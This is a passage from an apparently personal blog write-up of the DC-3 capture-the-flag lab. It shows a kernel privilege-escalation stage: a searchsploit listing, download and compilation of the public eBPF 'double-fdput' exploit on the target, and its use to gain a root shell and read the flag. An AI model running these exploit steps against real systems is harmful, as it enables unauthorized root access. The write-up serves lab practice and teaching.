39144 52 -rwsr-sr-x 1 daemon daemon 50748 Jan 15 2016 /usr/bin/at

Trying a PRNG Collision

A quick comparison against GTFOBins showed nothing directly usable. Next I went through the directories, including the dc3 user's home directory and the web root, in case of hidden files, but still found nothing. ps aux and netstat -ano gave nothing either, and I also tried an SSH public-key PRNG collision. Finally I turned to kernel exploits and linpeas.

┌──(kali㉿kali)-[~/Downloads/dc_3]
└─$ searchsploit Kernel 4.4 Privilege Escalation
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling P | macos/local/40957.c
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Esca | windows/local/42625.py
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Es | windows/local/42624.py
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Es | windows/local/42665.py
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Esc | linux/local/19933.rb
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4 | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) | linux_x86/local/9542.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege E | linux/local/41995.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | linux/local/40759.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privi | linux_x86-64/local/40871.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bound | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Cond | windows_x86-64/local/47170.c
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege | linux/local/39277.c
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege | linux/local/40003.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege | linux/local/39772.txt
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation | arm/local/31574.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Priv | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escal | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - L | linux/local/47169.c
Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel | hardware/local/48644.c
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Kernel Privilege Escalation

Based on the kernel version 4.4.0-21 and the Ubuntu 16.04 shown by /etc/issue,

www-data@DC-3:/tmp$ cat /etc/issue
cat /etc/issue
Ubuntu 16.04 LTS \n \l

I tried the following in turn; in addition I tried the Dirty COW vulnerability that linpeas rated as fairly likely.

Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)   | linux/local/40759.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privi | linux_x86-64/local/40871.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bound | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Cond | windows_x86-64/local/47170.c
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege | linux/local/39277.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege | linux/local/39772.txt

In the end the 'double-fdput()' bpf(BPF_PROG_LOAD) exploit succeeded, following the steps in its file.

┌──(kali㉿kali)-[~/Downloads/dc_3]
└─$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
--2023-07-10 23:39:42-- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
Resolving gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
Connecting to gitlab.com (gitlab.com)|172.65.251.78|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/octet-stream]
Saving to: ‘39772.zip’

39772.zip 100%[==============================================>] 6.86K 28.0KB/s in 0.2s

2023-07-10 23:39:43 (28.0 KB/s) - ‘39772.zip’ saved [7025/7025]


┌──(kali㉿kali)-[~/Downloads/dc_3]
└─$ unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar

┌──(kali㉿kali)-[~/Downloads/dc_3/39772]
└─$ tar xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c

Upload the files to the target one by one and make the sh file executable.

www-data@DC-3:/tmp$ chmod +x compile.sh
chmod +x compile.sh
www-data@DC-3:/tmp$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
www-data@DC-3:/tmp$ ls -laih
ls -laih
total 188K
1592 drwxrwxrwt 8 root root 4.0K Jul 11 13:46 .
2 drwxr-xr-x 22 root root 4.0K Mar 23 2019 ..
63123 drwxrwxrwt 2 root root 4.0K Jul 11 12:22 .ICE-unix
63126 drwxrwxrwt 2 root root 4.0K Jul 11 12:22 .Test-unix
63122 drwxrwxrwt 2 root root 4.0K Jul 11 12:22 .X11-unix
63124 drwxrwxrwt 2 root root 4.0K Jul 11 12:22 .XIM-unix
63125 drwxrwxrwt 2 root root 4.0K Jul 11 12:22 .font-unix
2193 -rw-r--r-- 1 www-data www-data 6.0K Jul 11 13:16 40049.c
2192 -rw-r--r-- 1 www-data www-data 16K Jul 11 13:11 41458.c
8618 -rwxr-xr-x 1 www-data www-data 23K Jul 11 13:25 chocobo_root
7188 -rw-r--r-- 1 www-data www-data 25K Jul 11 13:24 chocobo_root.c
7189 -rwxr-xr-x 1 www-data www-data 155 Jul 11 13:44 compile.sh
725 -rw-r--r-- 1 www-data www-data 2.9K Jul 11 12:12 dirtyc0w.c
8703 -rwxr-xr-x 1 www-data www-data 13K Jul 11 13:46 doubleput
7199 -rw-r--r-- 1 www-data www-data 4.1K Jul 11 13:44 doubleput.c
2178 -r-----r-- 1 www-data www-data 5 Jul 11 13:08 foo
8699 -rwxr-xr-x 1 www-data www-data 7.9K Jul 11 13:46 hello
7204 -rw-r--r-- 1 www-data www-data 2.2K Jul 11 13:44 hello.c
8565 -rwxr-xr-x 1 www-data www-data 18K Jul 11 13:12 pwn
8704 -rwxr-xr-x 1 www-data www-data 7.4K Jul 11 13:46 suidhelper
8406 -rw-r--r-- 1 www-data www-data 255 Jul 11 13:44 suidhelper.c
63265 drwx------ 3 root root 4.0K Jul 11 12:22 systemd-private-e1ed860c30e54788a139a4c5d9493034-systemd-timesyncd.service-QrMQ7U

The warnings do not stop us from getting the executable; running it gives root.

www-data@DC-3:/tmp$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/tmp# cd /root
cd /root
root@DC-3:/root# ls
ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order. :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

Source: https://i3eg1nner.github.io/2023/07/d3fd0d829200.html
Author: I3eg1nner
Published: 11 July 2023